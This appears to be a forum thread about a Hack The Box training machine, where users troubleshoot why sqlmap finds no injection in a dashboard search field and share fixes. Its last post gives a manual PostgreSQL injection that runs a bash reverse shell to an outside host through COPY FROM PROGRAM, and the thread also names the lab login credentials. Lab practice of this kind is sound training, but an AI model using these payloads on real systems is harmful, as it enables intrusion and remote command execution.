I’m making my way through the starting point machines and I’ve gotten stuck on the sqlmap section.
Looking at the walkthrough, there are cars listed in the catalogue, whereas mine is blank
When trying to use sqlmap with my PHPSESSID using the below command
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=r7qppotvj5cf7im1r47871dvpu"
It says that all of the tested parameters do not appear to be injectable
Any suggestions would be much appreciated.
I’ve never done this machine so I might be missing a lot.
However, have you checked the user account you used to log in with? It looks like it has given you different access permissions.
Type your comment> @TazWake said:
I’ve never done this machine so I might be missing a lot.
However, have you checked the user account you used to log in with? It looks like it has given you different access permissions.
Yeah, I logged in to the webapp using the credentials recovered from backup.zip and used the PHPSESSID from that session.
Everything is telling me that it should work, but for some reason it isn’t.
Just to confirm - the creds are: admin and qwerty789 is that correct?
If so, the box might be broken.
Type your comment> @TazWake said:
Just to confirm - the creds are:
adminandqwerty789is that correct?If so, the box might be broken.
Correct, that’s the creds I’m using.
Do you know if there is a way to reset the box? There isn’t an option that I can find to reset it.
@1ntgr said:
Correct, that’s the creds I’m using.
Do you know if there is a way to reset the box? There isn’t an option that I can find to reset it.
Unfortunately I dont know - you might have to raise a jira ticket with HTB and get them to fix it.
Type your comment> @TazWake said:
@1ntgr said:
Correct, that’s the creds I’m using.
Do you know if there is a way to reset the box? There isn’t an option that I can find to reset it.
Unfortunately I dont know - you might have to raise a jira ticket with HTB and get them to fix it.
I’ll do that. Thanks for the help, much appreciated!
I’m having the same issue. I have raised a jira ticket.
It looks to me like there is an issue with the postgreSQL database as the dashboard.php page is not populating with data from the database as shown in the walkthrough screenshots.
Also if there is a database issue, the search field may not actually be passing user input to the database as query, which would be a cause for sqlmap to not find any injection vulnerabilities as it is effectively just a ‘dumb’ search box right now.
On the bright side, if you are not familiar with SQL databases and how web pages interact with them, this could be a nice opportunity to get a better understanding of what could be going wrong here.
I ran into the same issue today and solved it by deleting my session cookie redoing the login on the website and redoing the sqlmap with the new session id. Sqlmap than produced the expected output.
Before I deleted my session cookie I had the same issue that no entries showed up in the dashboard.
This solved for me. Thank you for sharing @HaegarTheBear !
The problem still exissts. For some reason SQLMap is not working properly.
You can use this solution to do it manually.
'; CREATE TABLE cmd_exec(cmd_output text); --
'; COPY cmd_exec FROM PROGRAM 'bash -c ''bash -i >& /dev/tcp/10.10.14.107/1234 0>&1'''; --
you can also add --flush-session